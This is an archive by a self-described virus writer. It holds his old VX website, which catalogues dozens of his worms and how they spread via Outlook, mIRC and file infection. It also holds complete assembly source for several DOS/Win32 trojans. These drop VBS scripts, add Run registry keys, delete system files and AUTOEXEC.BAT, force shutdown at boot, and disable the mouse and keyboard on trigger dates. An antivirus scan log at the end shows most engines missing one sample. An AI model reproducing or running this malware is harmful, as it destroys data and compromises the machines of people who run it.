PetiKArchiver1 0

PetiK Archiver
1.0
17/05/2009
After 7 years to stop coding virus/worms, I decided to assemble all my works.
It is sorted by date like this : YYYYMMDD (where Y is the year, M the month and D the day) and
the name of the works.
In the begining you can see my old website page. Then my works. Newt, my not finish works and
some articles.
Best reading.
PetiK Homepage
(last update : July 9 th 2002)
EMAIL : petikvx@aol.com
NEW : FORUM FOR ALL VXERS : CLICK HERE
PLEASE SIGN MY GUESTBOOK : CLICK HERE
2002:
July 9th :
GOOD BYE TO ALL VXERS. I LEAVE THE VX-SCENE. I HOPE MY WORKS LIKE YOU AND WILL
HELP YOU IN YOUR VX-LIFE.
IF YOU WANT TO CONTACT ME, PLEASE WRITE IN THE GUESTBOOK.
Special Thanx to : alc0paul, Benny/29A, Bumblebee, Vecna, Mandragore, ZeMacroKiller98and the greatest
coder group : 29A
July 7th : Add some new descriptions of AV (from Trend Micro and McAfee)
July 3rd : Add the binary of my last Worm coded with alc0paul : VB.Brigada.Worm
July 2nd : Add a new link : Second Part To Hell
June 29th : Add my new tool : PetiK’s VBS Hex Convert and add my last full spread VBS worm : VBS.Hatred
June 26th : Add W32/HTML.Dilan
June 24th : Add VBS.Park
June 22nd : I finish my new worm : VB.DocTor.Worm
June 20th : PETIKVX EZINE #2 REALIZED : DOWNLOAD IT and add a new tool : CryptoText and my last worm :
VB.Mars.Worm
June 19th : Add VBS.Cachemire. Add my new article VBS/HTML Multi-Infection.
June 16th : I join a new Virus Group : Brigada Ocho (create by alc0paul)
June 1st : Add VB.Lili.Worm. My new worm is released : I-Worm.Haram
May 31st : I leave the rRlf group
May 23rd : New Ezine : rRlf#2
May 19th : I remove some source. You can find of them in PetiKVX#1 and the other in PetiKVX#2. Finish
VB.Visual.Worm published in PetiKVX #2
May 14th : Add W97M.ApiWord
May 12th : Add W32.HLLW.Archiver
May 10th : Add a new tool to protect against new VBS Worm : PPVBSW
May 9th : Add a new macro virus : W97M.AutoSpread
May 8th : I join the rRlf group (http://www.rrlf.de). Add HTML.Welcome.
May 6th : Add a new article : VBS Tutorial and exist in PDF
April 27th : Add VBS.Xchange
April 21st : Add all source of my works.
April 7th : Add my first Ezine : PetiKVX Ezine #1. My new email is Petikvx@aol.com
March 15th : Add I-Worm.Together
March 14th : My new email : petikvx@lycos.fr (petikvx@multimania.com failed)
March 10th : Add W32.HLLW.LiteLo
March 9th : Add my articles in PDF format : articlesPDF and 29A#6.
March 8th : Add my first VBS worm and HTML virus generator : PSWVG (W32.PSVG.gen : Norton AntiVirus,
Constructor.VBS.PSWVG.10 : AVP)
March 3rd : Add a new virus/worm : VBS/W97M.Doublet
February 25th : Add a macro virus : W97M.Wolf
February 24th : Add a lame love worm : HTML.Linda
February 22nd : Add W32.HLLW.Wargames
February 18th : Add a new Ezine : rRlf
February 16th : Add my first virus (perhaps bug) : WinRAR.Linda
February 14th : Add a new HTML virus : HTML.Macrophage
February 10th : Can download my last worm. Add my second article : Technics
February 7th : Finish my last worm : I-Worm.Falken (can’t download immediately)
February 4th : Add new worm : I-Worm.Extract
February 1st : New Worm : W32/W97M.Twin
January 27th : I come back with a new worm : HLLW.SingLung.Worm
January 20th : Add PetiKShow. This program contains all the sources of my works.
January 10th : Add an old article about Worm Spreading written by me on September 19th .
January 1st : HAPPY NEW YEAR. I DECIDED TO STOP TO CODE VIRII AND WORM. GOOD BYE
2001:
December 10th : Add my last worm : W32.HLLW.Last
November 6th : I-Worm.Anthrax
October 12th : I-Worm.WTC
September 8th : I-Worm.Passion
September 2nd : I-Worm.Rush
August 24th : I-Worm.Casper
August 18th : Add the tool tElock 5.1 (A compress/encrypted PE file)
August 16th : I-Worm.Kevlar
August 12th : New design. You can hear one of my compositions.
August 9th : New descrption from AVP about I-Worm.MadCow and I-Worm.Friends.
August 8th : I-Worm.XFW
July 18th : New Fanily : W32.Pet_Tick family (6), VBS.Pet_Tick family (3) from Norton Antivirus
July 8th : I-Worm.MaLoTeYa
July 3rd : VBS.Delirious
June 30 th : I-Worm.Bush
June 19th : I-Worm.Winmine
June 18th : W97M.Blood
June 17th : VBS.Seven
June 10th : VBS.Starmania, I-Worm.Gamma, W97M.Kodak
June 4th : BAT.Quatuor
June 3rd : Bastille, JS.Germinal
June 2nd : Add some Worms : HTML.Embargo, I-Worm.Mustard
May 25th : I start my homepage.
Source
You can found here my different worms that I create :
AntiVirus Name
Real Name Date Description
(TM=Trend Micro)
It's a DOS worm. It uses mIRC to

AVP : IRC.Worm.PetiK
Bastille 06/03/2001 spread. On July 14th, he stops
TM : Bat.PetiK.A
the computer
A BAT file which uses mIRC to

BAT.Quatuor 06/04/2001 IRC.Becky.A
spread.
CryptoText 06/20/2002 Coded in VB6. Encrypt ASCII file.
It is script that uses ActiveX

controls to perform actions. It
HTML.Bother.3180
modifies the default home page.
It infects to all .HTM and .HTML
HTML.Bother 05/13/2001
files that it founds in the \MY
AVP : VBS.Both
DOCUMENTS and \WINDOWS\WEB
TM : HTML.Bother.A
folders. The default icon for
.html files is changed.
It copies itself to
\WINDOWS\WinHelp.htm. Change the
HTML.Embargo 05/29/2001 VBS.Embaro.A.Intd
AUTOEXEC.BAT. It uses mIRC
channel to spread
HTML.Linda 02/24/2002 Lame love worm.
Infect htm,html,htt,hta and asp

HTML.Prepend
HTML.Macrophage 02/14/2002 files in different special
Panda : HTML/Mage
folders.
My first virus for rRlf group.

VBS.Manu@mm
Infects web files
HTML.Welcome 05/08/2002
(htm,html,htt,asp) and spread
TM : VBS.PATIK.G
with Outlook into a VBS file.
W95.Pet_Tick.gen
Open WAB default file to take
I-Worm.Anthrax 11/06/2001 some email and spread with MAPI.
TM : Worm.Pettick.A
Spread with mIRC too.
Sophos : W32/Petick-A
W95.Pet_Tick.E@mm
I-Worm.Bush 06/30/2001 Uses MAPI to spread. Not BUGS.
AVP : I-Worm.PetiK.e
It‘s a utility which detect

I-Worm.Casper 08/24/2001 TM : Worm.Capser.A Happy99 and Icecubes. Uses MAPI.
Perhaps bugz.
I-Worm.Dandelion 11/16/2001 UNRELEASED WORM
Panda : W32/Extract
I-Worm.Extract 02/04/2002 Open KERNEL32.DLL to find API.
TM : WORM.PETIK.L
I-Worm.Falken 07/02/2002 First WGAA Worm. WARNING !
W32.Pet_Tick.B
It uses a VBS file and mIRC to
W32.Fiend.Worm
I-Worm.Friends 05/05/2001 spread. he alters the Window's
owner and company.
AVP : I-Worm.PetiK.b
W95.Pet_Tick.D@mm
Scan all *.*htm* file in
W95.Wormfix.Worm@mm
I-Worm.Gamma 05/09/2001 "Temporary Internet Files" and
uses MAPI function to spread
AVP : I-Worm.PetiK.c
Spread with a randome VBS file in

I-Worm.Haram 06/01/2002 StartUp folder and put an HTML
virus.
Infect C???????.exe. Scans some

W32.Pet_tick.M
email address in the Outlook
I-Worm.Kevlar 08/16/2001 TM : Worm.Kevlar.A
Address Book and uses MAPI to
Panda : Worm.PetiK.C
spread.
W32.Pet_Tick.Intd
Sophos : W32/Petik-K Uses MAPI function to spread.

I-Worm.Loft 06/23/2001 Open some DLL files to uses some
AVP : I-Worm.PetiK.k API.
TM : Worm.PetiK.K
It's my first worm. It uses

W32.Pet_Tick.A@mm
Outlook and mIRC to spread. It
W32.Salut.Worm@mm
I-Worm.MadCow 12/01/2000 creates \SYSTEM\MSLS.ICO and will
be the default icon of .exe
AVP:I-Worm.PetiK.a
files.
W32.Pet_Tick.G
W32.Malot.Int Uses MAPI to spread. Create a
HTML file in the StartUp folder
I-Worm.MaLoTeYa 07/08/2001
AVP : I-Worm.PetiK.f to send some informations about
the user. CONTRIBUTE TO 29A#6.
TM : Worm.Malot.A
Modify "Exclude.dat" in the

W32.Update.Worm
"Install Folder" of Norton
I-Worm.Mustard 05/27/2001 Antivirus to create a VBS file.
AVP : I-Worm.PetiK.d
The worm spread with Outlook
TM : Worm.Mustard.A
which use this VBS file.
Copy all mail of Outlook Address

Book in a file and scans this
I-Worm.Passion 09/08/2001 W95.Pet_Tick.gen
file to spread. Change some URL 1
times of 10.
W95.Pet_Tick.C@mm
W95.Buggy.Worm@mm Modify the Wallpaper with a BMP
file that it download to a ftp
I-Worm.PetiK 02/07/2001
AVP : I-Worm.IEPatch site. He spread with a VBS file
which use Outlook.
TM : Worm.PetiK.A
Not bugz for MAPI functions.

Start of propagation by error on
I-Worm.Rush 02/09/2001 TM : Worm.Rush.A
August 30th . Some payloads with
some titles of windows.
I-Worm.Together 03/15/2002 W32.Pet_Tick.AC@mm Kill some AV. 100% assembler.
W32.Mineup.Worm
AVP : I-Worm.Petik
I-Worm.Winmine 06/19/2001 Uses Outlook to spread.
McAfee:W32/PetTick@MM
Panda : W32/PetTick
Sophos : W32/Petik-WTC A Worm against the terrorism.

I-Worm.WTC 10/11/2001 Infect RAR files in the Personal
TM : WORM.PETTICK.Q directory.
W95.Pet_tick.gen
Infect WSOCK32.DLL and all DLL
I-Worm.XFW 08/08/2001
TM : Trojan.PetiK.XFW files in the SYSTEM directory.
Panda : Worm.PetiK.D
JS.Lamnireg.A Trojan It infects JS file in \WINDOWS,

\WINDOWS\Desktop and
JS.Germinal 06/02/2001
AVP : JS.Germinal \WINDOWS\SAMPLES\WSH directories.
TM : JS.Germinal.A It uses mIRC to spread.
Coded with alc0paul and spread

VB.Brigada.Worm 07/03/2002 TM : WORM.CRAZYBOX.A with Macro Word, ZIP and Outlook.
My last worm.
W32/W97M.Dotor.Worm
VB.DocTor.Worm 06/22/2002 It spread by infecting DOC files

McAfee : W32/DoTor
Panda : W32/Dotor.A
W32.Pet_Ticky.B
VB.Lili.Worm 06/01/2002 A lame worm with a XXX picture
Panda : W32/Petlil.A
This worm spread by scaning the

W32.Gubed.Worm
start page of Internet Explorer
VB.Mars.Worm 06/20/2002 to find some email. The binary is
McAfee : W32/Gubed
also stocking into a VBS file in
TM : WORM.GUBED.A
the %StartUp% folder.
My first worm coded in Visual

VB.Visual.Worm 05/19/2002 W32.Pet_Ticky.gen
Basic. Lame worm.
A worm which spread in a local

VBS.Cachemire 06/19/2002 network and have a greate power
of spreading.
VBS.Pet_Tick.C@m
VBS.Ketip.C@m
VBS.Delirious 07/03/2001 Put his code in NORMAL.DOT
AVP : I-Worm.Petik.h
This virus infects VBS and DOC

VBS/W97M.Doublet 03/03/2002 VBS.Doublet@mm
files. Spread with Outlook.
This worm/virus infects VBS files

VBS/W97M.Xchange 04/27/2002 and DOC documents Word.
CONTRIBUTE TO RRLF#2
VBS.GoodBye 12/01/2001 UNRELEASED WORM
Encrypt with my tool “PetiK’s VBS

VBS.Hatred 06/29/2002
Hex Convert”
Use ftp to download a file (virus

VBS.Pet_Tick.B@mm ?, trojan horse ?). If we are the
VBS.Judge 12/08/2000
VBS.Ketip.B@mm 1st of the month, Judge modifies
the AUTOEXEC.BAT.
VBS.Park 06/24/2002 A VBS/HTML multi-infection virus
It arrives as an HTML email

VBS.Pet_Tick.A@mm message. It use Outlook and mIRC
VBS.Ketip.A@mm clients to spread. It infects
VBS.PetiK 01/31/2001
different files and sends some
AVP : I-Worm.LeeBased information from infected
computer to 2 email addresses.
VBS.Chism@mm
VBS.Copy.A@mm
VBS.Seven 06/18/2001 Many actions in any day
AVP : I-Worm.Petik.i
TM : VBS.PETIK.I
VBS.ManiaStar.A@mm It infects all VBS files in

different folders. It spread with
VBS.Starmania 06/15/2001
AVP : IRC- three different subject, body and
Worm.generic.vbs attachment.
Infect ZIP files in certain

W32.HLLW.Archiver 05/12/2002
folders.
My very first (and last) worm

W32.HLLW.Last 10/12/2001 Sophos : W32/Stall-A
written with Borland C++.
W32.HLLW.LiteLo 03/10/2002 A lame HLL worm.
Open *.ht* file to find some

W32.HLLW.SingLung 01/27/2002 AVP : I-Worm.Stopin email and spread with MAPI
functions.
AVP : I-Worm.WarGam
Differents way of propagation :
Viruslist : WarGame
W32.HLLW.Wargames 02/22/2002 open *htm files, old mail read
and Outlook Address
W32.WarGam.Worm
W97M.Comical This worm uses VBA and W32asm to

W32/W97M.Twin 02/01/2002
Sophos : W97M.Comical spread.
Spread via HTML files by

W32/HTML.Dilan 06/26/2002 infecting them in specifics
folders.
This virus infects RAR files

Win32RAR.Linda 02/16/2002 while adding the virus and HTM
files while adding a script.
Uses some API to infect Word

W97M.ApiWord 05/14/2002 W97M.Apish
Document
A large spreading. Export “Sleep”

W97M.AutoSpread 05/09/2002 W97M.Beko@mm
API
W97M.Pet_Tick.Intd
W97M.Ketip.Intd
W97M.Blood 06/18/2001 Infect NORMAL.DOT.
AVP : Embedded
W97M.Adok.A
W97M.Kodak 06/10/2001 Infect NORMAL.DOT.
AVP:Macro.Word97.Adok
W97M.OutlookWorm.Gen
AVP :
It uses mIRC and Outlook to
W97M.Maya 06/05/2001 Macro.Office.Melissa-
spread.
based
TM : W97M.AYAM.A
Infect .doc files with the “Wolf”

W97M.Wolf 02/25/2002 W97M.Droopy.A
module. Thanx to Walrus
Links
A selection of the best virii sites :
VirLinux : http://www.virlinux.fr.fm A French site about virii’s Linux
VIRUS CODERS :
Alc0paul : http://alcopaul.cjb.net
Belial : http://home.foni.net/~belial
Benny : http://www.coderz.net/benny
Black Jack : http://blackjackvx.cjb.net
Del_Armg0 : http://www.delly.fr.st French coder
FlyShadow : http://flyshadow.cjb.net
Gigabyte : http://www.coderz.net/gigabyte
Immortal Riot : http://www.immortalriot.cjb.net
Kalanar : http://virii.at/ak or http://www.kvirii.com.ar
Lord Julus : http://lordjulus.cjb.net
NBK : http://www.nbk.hpg.ig.com.br
Nucleii : http://www.coderz.net/nucleii/main.html
Pointbat : http://pbat.cjb.net/ French coder
Silvio : http://www.big.net.au/~silvio/
Ratter : http://www.coderz.net/ratter/
SPTH (Second Part To Hell) : http://www.spth.de.vu/
The Walrus : http://walrus.up.to
Tipiax : http://www.multimania.com/tipiax French coder
Vecna : http://www.coderz.net/asm_infamy
VirusBuster : http://vtc.cjb.net
Voven/SMF : http://vovan-smf.wz.cz/
VXUniverse : http://vxuniverse.cjb.net
ZeMacroKiller98 : http://www.crosswinds.net/~zemacrokiller98/index.htm French coder
Zulu : http://www.coderz.net/zulu
VX GROUPS :
29A : http://29a.host.sk
ASM : http://kickme.to/asm
BlackArt : http://blackart.cjb.net
Black Cat virii Group : http://www.ebcvg.com or http://bcvgvx.cjb.net/
Brigada Ocho : http://brigada8.cjb.net
HFX : http://www.hfactorx.org/
Indonesian Virus : http://indovirus.8m.com/
Kryptocrew : http://www.kryptocrew.de
LineZero : http://www.coderz.net/lz0vx/start.htm
MATRiX : http://www.coderz.net/mtxvx
NoMercy : http://www.coderz.net/nomercy/
Pinoy Virus Writer : http://hackers.b3.nu
rRlf : http://www.rrlf.de/
ShadowVX : http://shadowvx.members.easyspace.com/
SMF : http://www.sallyone.com/smf/e_index.htm , http://smfgroup.cjb.net
Ultimate Chaos : http://www.ultimatechaos.co.uk/
Virus Brasil : http://www.virusbrasil.8m.com
OTHER SITES :
Coderz : http://www.coderz.net
Red Virica : http://redvirica.host.sk/
Virii Argentino : http://www.virii.com.ar
Virus Central : http://www.viruscentral.org/
VirusList : http://www.viruslist.com
Virus Trading Center : http://www.oninet.es/usuarios/darknode/
VX-DNET : http://surf.to/vxdnet
VX Heavens : http://vx.netlux.org/
Virus Trading : http://www.virustrading.com/
VX Universe : http://vxuniverse.cjb.net/
ExeTools : http://www.exetools.com
ProTools : http://protools.cjb.net
ANTIVIRUS SITES :
AVP : http://www.avp.ch
Symantec : http://www.symantec.com/avcenter
Trend Micro : http://www.trendmicro.com
CONTACT : GuestBook
© 2001-2002 PetiK. All informations on this site is for educational purpose only .
;TAILLE : 475 OCTETS 31/08/00
;DWARF crée un fichier dwarf.vbs qui ajoutera une clé afin
;que l'ordinateur s'éteigne au démarrage
.model small
.code
org 100h
DEBUT : mov ah,09h ;affiche un message

lea dx,text1 ;avec deux proposition
int 21h
TOUCHE: mov ah,1 ;lecture du caractŠre

int 21h
cmp al,'C'
je CREER_FICHIER
cmp al,'c'
je CREER_FICHIER ;si 'C-c' on continue
cmp al,'Q'
je FIN_PROGRAMME
cmp al,'q'
je FIN_PROGRAMME ;si 'Z-z' on stop
mov dx,offset bad ;mauvaise touche
mov ah,9h
int 21h
jmp TOUCHE
CREER_FICHIER: mov ah,3Ch ;CREE UN FICHIER

xor cx,cx
mov dx,offset NOM ;ET LUI DONNE UN NOM
int 21h
ECRIRE_FICHIER: xchg ax,bx
mov ah,40h ;ECRIT DANS LE FICHIER
mov cx,meslen
mov dx,offset note
int 21h
FERMER_FICHIER: mov ah,3Eh ;PUIS LE REFERME
int 21h
mov dx,offset updir ;CHANGEMENT DE REPERTOIRE
mov ah,3Bh
int 21h
MESSAGE: mov ah,09h ;AFFICHE LE MESSAGE

lea dx,msg
int 21h
FIN_PROGRAMME : mov ah,4Ch ;FERME LE PROGRAMME

int 21h
text1 db 10,13,'Tape C pour continuer ou Q pour quitter : $'

bad db 7,7,8,' ',8,24h
NOM db 'c:\dwarf.vbs',0
updir db '..',0
msg db 7,7,7,10,13,'SALUT MEC !!!!'
db 10,10,13,'UN FICHIER A ETE RAJOUTE'
db 10,13,'IL SE NOMME C:\dwarf.vbs $'
note db 'rem DwArF.vbs by Panda '
db '(c) 2000'
prog db 'Dim WSHShell',0Dh,0Ah
db 'Set WSHShell = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'WSHShell.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\'
db 'Windows\CurrentVersion\Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE '
db 'C:\Windows\system\User.exe,ExitWindows"'
meslen equ $-note
end DEBUT
;Par M.Xxxxxxx XXXXXXX (c)2000 09/09/00
;TAILLE : 689 OCTETS
;TESTE LE PREMIERE FOIS AU LYCEE KIRSCHLEGER DE MUNSTER
;DWARF259 CREE DEUX PROGRAMME :
; -Dwarf.vbs dans C: active Evil.com … chaque d‚marrage
; -Evil.com dans C:\WINDOWS.
;Le 25 septembre, il renomme REGEDIT.EXE dans la corbeille
;en DWARF.AZE et efface AUTOEXEC.BAT et WIN.INI
.model small
.code
org 100h
TOUT_DEBUT: jmp FILE1
VERIFICATION: mov ah,2Ah

int 21h
cmp dh,9
jnz FIN_VIRUS
cmp dl,25 ;25 SEPTEMBRE ?
jnz FIN_VIRUS ;NON : FIN DU TROJAN
AFFICHE: mov ah,9
lea dx,MSG
int 21h
DISQUE: mov ah,41h
mov dx,offset AUTOEXEC
int 21h ;EFFACE AUTOEXEC.BAT
mov dx,offset WININI
int 21h ;EFFACE WIN.INI
mov ah,56h
mov dx,offset REG ;RENOMME REGEDIT.EXE
mov di,offset CORBEILLE ;EN DWARF.AZE
int 21h
FIN_VIRUS: mov ah,4Ch
int 21h
MSG db 7,7,7,'TROJAN.DWARF par PandaKiller (c)2000'

db 10,10,13,'BOOM! BOOM! BOOM! BOOM! BOOM! BOOM!'
db 10,13,' ÛÛÛ Û Û ÛÛ ÛÛÛ ÛÛÛÛ'
db 10,13,' Û Û Û Û Û Û Û Û Û '
db 10,13,' Û Û Û Û ÛÛÛÛ ÛÛÛ ÛÛÛ '
db 10,13,' Û Û Û Û Û Û Û Û Û Û '
db 10,13,' ÛÛÛ Û Û Û Û Û Û Û $'
WININI db 'C:\WINDOWS\Win.ini',0
AUTOEXEC db 'C:\autoexec.bat',0
REG db 'C:\WINDOWS\Regedit.exe',0
CORBEILLE db 'C:\RECYCLED\dwarf.aze',0
progl2 equ $-VERIFICATION
FILE1: mov ah,3Ch

xor cx,cx
mov dx,offset NOM1
int 21h ;CREATION DU 1ER FICHIER
xchg ax,bx
mov ah,40h
mov cx,progl1 ;LONGUEUR DU PROGRAMME
mov dx,offset prog1 ;DEBUT DU PROGRAMME
int 21h ;ECRITURE
mov ah,3Eh
int 21h ;FERMETURE
FILE2: mov ah,3Ch
xor cx,cx
mov dx,offset NOM2
int 21h ;CREATION DU 2ND FICHIER
xchg ax,bx
mov ah,40h
mov cx,progl2 ;LONGUEUR DU PROGRAMME
lea dx,VERIFICATION ;DEBUT DU PROGRAMME
int 21h ;ECRITURE
mov ah,3Eh
int 21h ;FERMETURE
FIN: mov ah,4Ch
int 21h
NOM1 db 'c:\Dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Evil.com',0
prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
db 'msgbox "C''EST PARTI",vbcritical',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Evil.com"'
progl1 equ $-prog1
end TOUT_DEBUT
;Par M.Xxxxxxx XXXXXXX (c)2000 12/09/00
;DWARF7 CREE DEUX PROGRAMME : Dwarf.vbs et Panda.vbs. DWARF.VBS VA
;RAJOUTER UNE CLE POUR ACTIVER PANDA.VBS TOUS LES JOURS. PANDA.VBS
;ENTRE EN ACTION QUE LE 5 DECEMBRE. IL RAJOUTE UNE CLE POUR ETEINDRE
;L'ORDINATEUR AU DEMARRAGE ET CREE UN FICHIER AUTOEXE.BAT QUI
;SUPPRIMERA DES FICHIER SUR L'ORDINATEUR.
.model small
.code
org 100h
FILE1: mov ah,3Ch
xor cx,cx
mov dx,offset NOM1
int 21h ;cr‚ation du 1er fichier
xchg ax,bx
mov ah,40h
mov cx,progl1
mov dx,offset prog1
int 21h ;‚criture
mov ah,3Eh
int 21h ;fermeture
FILE2: mov ah,3Ch
xor cx,cx
mov dx,offset NOM2
int 21h ;cr‚ation du 2nd fichier
xchg ax,bx
mov ah,40h
mov cx,progl2
mov dx,offset prog2
int 21h ;‚criture
mov ah,3Eh
int 21h ;fermeture
MESSAGE: mov ax,3
int 10h
mov ah,9
lea dx,msg
int 21h
FIN: mov ah,4Ch
int 21h
NOM1 db 'c:\Dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Panda.vbs',0
db 'msgbox "BONNO JOURNEE ?",vbexclamation',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Panda.vbs"'
progl1 equ $-prog1
prog2 db 'If Day(Now) = 5 And Month(Now) = 12 Then',0Dh,0Ah
db 'msgbox "ERREUR : CLIQUEZ SUR OK",vbcritical',0DH,0Ah
db 'Dim W',0DH,0Ah
db 'Set W=CreateObject("WScript.Shell")',0DH,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
db 'Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE '
db '%windir%\system\user.exe,Exitwindows"',0DH,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
db 'Run\DwArF2", "C:\autoexe.bat"',0DH,0Ah
db 'Set X=CreateObject("Scripting.FileSystemObject")',0DH,0Ah
db 'file="C:\autoexe.bat"',0DH,0Ah
db 'Set O=X.CreateTextFile(file, True, False)',0DH,0Ah
db 'O.Writeline "@echo off"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.ini"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.bmp"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\E*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\M*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\COMMAND\*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.dll"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.ini"',0DH,0Ah
db 'msgbox "TU VAS MOURIR DEMAIN",vbinformation',0DH,0Ah
db 'End If',0DH,0Ah
progl2 equ $-prog2
msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
db 'IL SE NOMME C:\Dwarf.vbs',10,10,13
db 'OUVRE LE VITE $'
end FILE1
;Panda3.asm par PandaKiller 03/10/00
;TASM32 /M /ML panda3
;TLINK32 -Tpe -x -aa panda3,,,import32
.386
locals
jumps
.model flat
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn MessageBoxA:PROC
extrn WinExec:PROC
extrn ExitProcess:PROC
.data
octets dd ?
flz_handle dd ?
nom_fichier db 'C:\Salut.vbs',00h
prog db 'C:\Salut.vbs',00h
TEXTE db 'Salut ! Ca va ?',00h
TITRE db 'Hello',00h
TEXTE2 db 'J''ai mis un fichier sur ton ordinateur',0dh,0ah
db 'Il s''appelle Salut.vbs et se trouve dans C:\',0dh,0ah
db 'Ouvre-le vite',00h
TITRE2 db 'FICHIER CREE',00h
CLE db '\Software\Microsoft\Windows\CurrentVersion',00h
DONNEE db 'PandaKiller',00h
NOM db 'RegisteredOwner',00h
p dd 0
l dd 0
DEBUTV:
db '''VBS/PandaKiller.Trojan.A PAR Pentasm99 (c)2000 03/10/00',0dh,0ah
db '''SE COPIE DANS WINDOWS ET WINDOWS\SYSTEM',0dh,0ah
db '',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'Set a = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set win = a.GetSpecialFolder(0)',0dh,0ah
db 'Set sys = a.GetSpecialFolder(1)',0dh,0ah
db 'Set c = a.GetFile(WScript.ScriptFullName)',0dh,0ah
db 'c.Copy(win&"\WSock32.dll.vbs")',0dh,0ah
db 'c.Copy(sys&"\PandaDwarf.txt.vbs")',0dh,0ah
db 'INTERNET()',0dh,0ah
db 'BUG2001()',0dh,0ah
db 'Set T = a.deletefile("C:\Salut.vbs")',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db '''MODIFIE LA PAGE INTERNET ET RAJOUTE UN RESISTRE DANS "RUN"',0dh,0ah
db 'Sub INTERNET()',0dh,0ah
db 'Dim W',0dh,0ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0dh,0ah
db 'W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
db 'Start Page", "http://www.penthouse.com"',0dh,0ah
db 'W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'StartWindoz", "C:\WINDOWS\SYSTEM\WSock32.dll.vbs"',0dh,0ah
db '',0dh,0ah
db '''DESACTIVE LA SOURIS ET LE CLAVIER EN 2001 ET EXECUTE WINMINE',0dh,0ah
db 'Sub BUG2001()',0dh,0ah
db 'If Year(Now) = 2001 Then',0dh,0ah
db ' Dim P',0dh,0ah
db ' Set P = Wscript.CreateObject("WScript.Shell")',0dh,0ah
db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'Stop1", "rundll32,mouse disable"',0dh,0ah
db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'Stop2", "rundll32,keyboard disable"',0dh,0ah
db ' P.run ("C:\WINDOWS\Winmine.exe")',0dh,0ah
db 'End If',0dh,0ah
taille equ $-DEBUTV
.code
REGISTRE: push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;DANS RegisteredOwner
push p
call RegSetValueExA ;CREE UN REGISTRE
push 0
call RegCloseKey ;FERME LA BASE DE REGISTRE
FICHIER: push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset nom_fichier ;DONNE LE NOM DU FICHIER
call CreateFileA
mov [flz_handle],eax
push 00000000h
push offset octets
push offset taille
push offset DEBUTV
push [flz_handle]
call WriteFile
push [flz_handle]
call CloseHandle
MESSAGE: push 40h
push offset TITRE
push offset TEXTE
push 0
call MessageBoxA
push 40h
push offset TITRE2
push offset TEXTE2
push 0
call MessageBoxA
push 1
push offset prog
call WinExec
FIN: push 0
call ExitProcess
end REGISTRE
File Panda3.exe received on 05.16.2009 18:00:23 (CET)
Antivirus Version Last Update Result

a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.16 -
AntiVir 7.9.0.168 2009.05.15 -
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.16 -
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 -
BitDefender 7.2 2009.05.16 Generic.Malware.Ssp!.1E162891
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 -
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.16 -
F-Secure 8.0.14470.0 2009.05.15 -
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 Generic.Malware.Ssp!.1E162891
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Type_Script
McAfee 5616 2009.05.15 -
McAfee+Artemis 5616 2009.05.15 -
McAfee-GW-Edition 6.7.6 2009.05.15 -
Microsoft 1.4602 2009.05.16 -
NOD32 4080 2009.05.15 -
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 -
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 -
